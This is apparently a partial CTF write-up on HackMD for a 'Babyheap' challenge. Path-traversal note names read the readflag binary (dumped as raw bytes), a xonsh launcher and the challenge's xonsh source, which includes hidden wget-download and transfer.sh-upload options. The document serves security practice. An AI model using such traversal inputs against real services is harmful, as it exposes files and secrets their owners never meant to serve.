HackMD- Fei·Last edited by jyny on Jan 14, 2022Linked with GitHubContributed by
- Edit
Log in to edit or delete your comments and be notified of replies.
There is no commentSelect some text and then click Comment, or simply add a comment to this page from below to start a discussion.nc eof.h4ck3r.quest 7122
======== [Babyheap] ========
1. Malloc
2. Show
3. List
4. Free
0. Exit
----------------------------
> 2
Note name: ../../../../../../../../../readflag
1 ELF>?@?:@8
@@@@h???(( XX?-?=?=???-?=?=????DDP?td <<Q?tdR?td?-?=?=/lib64/ld-linux-x86-64.so.2GNU?4'h??0???NO?? ?r?GNU??e?mu 1M? ? !)7"setuidfopenperrorputsfclosesetegidseteuidfread__cxa_finalizesetgid__libc_start_mainlibc.so.6GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable_ui i???phh@????????
2 ??@ @(@0@8@@ H@
P@
?H?=???.?DH?=i/H?b/H9?tH??.H??t??????H?=9/H?52/H)?H??H???H??H?H??tH??.H????fD???=?.u/UH?=v.H??t?p????%?/?`????%2/f?1?I??^H??H???PTL?*H?
H?=?.?-????h?????.]?????{???UH??H?????????????????????????d???HDž????HDž????HDž???H???HDž???HDž???HDž ???HDž(???HDž0???HDž8???HDž@???HDžH???HDžP???HDžX???HDž`???HDžh???HDžp???HDžx???H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?5?
H?=?
?+???H?E?H?}?uH?=?
?$?????@H?U?H??????H?Ѻ?H??????H??????H??????H?E?H?????????f.??AWL?=/*AVI??AUI??ATA??UH?- *SL)?H??#???H??t?L??L??D??A??H??H9?u?H?[]A\A]A^A_??H?H??r/flagfopen8
?????????????T??????????????,zRx
`???+zRx
$?????FJ
? ??;*3$"D???\?????A?C
D|????]B?I?E ?E(?D0?H8?G@j8A0A(B BB??????p_
?????0
3 ?
@?P? ??????op???o???oR???o?=6FVfv????h@GCC: (Debian 10.2.1-6) 10.2.1 20210110??0?p ?
4 P
?? P ?=?=?=??@`@p@??
0!p7p@C?=j?v?=??????T!????=??=??=? ?@?
? `@0ASp@Zm?`@? ?h@? ??]?x@??+?p@????? p@( BU"p?crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryreadflag.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5fread@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5__libc_start_main@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmainsetgid@GLIBC_2.2.5fopen@GLIBC_2.2.5perror@GLIBC_2.2.5__TMC_END___ITM_registerTMCloneTablesetuid@GLIBC_2.2.5__cxa_finalize@GLIBC_2.2.5setegid@GLIBC_2.2.5seteuid@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment?#??$6?? D??No
00V???^???oRRk???oppz???BPP?? ????A? ? ? <?P ??????=?-?????@?`@`p@p?0p0'?0?- X7??9
======== [Babyheap] ========
1. Malloc
2. Show
3. List
4. Free
0. Exit
----------------------------
> 2
Note name: ../../../../../../../../..//usr/local/bin/xonsh
1 #!/usr/local/bin/python
2 # -*- coding: utf-8 -*-
3 import re
4 import sys
5 from xonsh.main import main
6 if __name__ == '__main__':
7 sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
8 sys.exit(main())
======== [Babyheap] ========
1. Malloc
2. Show
3. List
4. Free
0. Exit
----------------------------
> 2
Note name: /home/babyheap/main.xonsh
1 #!env xonsh
2 import secrets
3 import atexit
4 from urllib.parse import urlparse
5 from os import path
6 sandbox = f"/tmp/sandbox/{secrets.token_hex(16)}"
7 atexit.register(lambda: $[rm -rf @(sandbox)])
8 rm -rf @(sandbox)
9 mkdir -p @(sandbox)
10 cd @(sandbox)
11 def menu():
12 print(
13 "======== [Babyheap] ========\n"
14 "1. Malloc\n"
15 "2. Show\n"
16 "3. List\n"
17 "4. Free\n"
18 "0. Exit\n"
19 "----------------------------\n"
20 )
21 while True:
22 menu()
23 option = input("> ")
24 if option == "1":
25 file = secrets.token_hex(8) + ".txt"
26 size = input("Size: ")
27 if not size.isdigit():
28 exit -1
29 size = int(size)
30 content = input("Content: ")[:size]
31 echo @(content) | cowsay > @(file)
32 echo f"Note {file} created"
33 elif option == "2":
34 file = input("Note name: ")
35 if path.exists(file):
36 nl @(file)
37 else:
38 echo f"Note '{file}' does not exist"
39
40 elif option == "3":
41 for file in gp`./*.txt`:
42 echo "[+]" @(file.name)
43
44 elif option == "4":
45 file = path.basename(input("Note name: "))
46 if path.exists(file):
47 rm -f @(file)
48 echo f"Deleted '{file}'"
49 else:
50 echo f"free(): double free detected in tcache 1"
51 elif option == "9487":
52 url = input("URL: ")
53 if urlparse(url).path.endswith(".txt"):
54 wget --no-clobber @(url)
55 else:
56 echo "Should be a .txt file"
57
58 elif option == "9527":
59 zip export.zip *
60 link = $(curl --upload-file export.zip https://transfer.sh/export.zip)
61 echo f"Exported to {link}"
62 rm -f export.zip
63 elif option == "0":
64 echo "Exiting..."
65 break
66
67 else:
68 echo "Invalid option"
69 print()
#!env xonsh
import secrets
import atexit
from urllib.parse import urlparse
from os import path
sandbox = f"/tmp/sandbox/{secrets.token_hex(16)}"
atexit.register(lambda: $[rm -rf @(sandbox)])
rm -rf @(sandbox)
mkdir -p @(sandbox)
cd @(sandbox)
def menu():
print(
"======== [Babyheap] ========\n"
"1. Malloc\n"
"2. Show\n"
"3. List\n"
"4. Free\n"
"0. Exit\n"
"----------------------------\n"
)
while True:
menu()
option = input("> ")
if option == "1":
file = secrets.token_hex(8) + ".txt"
size = input("Size: ")
if not size.isdigit():
exit -1
size = int(size)
content = input("Content: ")[:size]
echo @(content) | cowsay > @(file)
echo f"Note {file} created"
elif option == "2":
file = input("Note name: ")
if path.exists(file):
nl @(file)
else:
echo f"Note '{file}' does not exist"
elif option == "3":
for file in gp`./*.txt`:
echo "[+]" @(file.name)
elif option == "4":
file = path.basename(input("Note name: "))
if path.exists(file):
rm -f @(file)
echo f"Deleted '{file}'"
else:
echo f"free(): double free detected in tcache 1"
elif option == "9487":
url = input("URL: ")
if urlparse(url).path.endswith(".txt"):
wget --no-clobber @(url)
else:
echo "Should be a .txt file"
elif option == "9527":
zip export.zip *
link = $(curl --upload-file export.zip https://transfer.sh/export.zip)
echo f"Exported to {link}"
rm -f export.zip
elif option == "0":
echo "Exiting..."
break
else:
echo "Invalid option"
print()
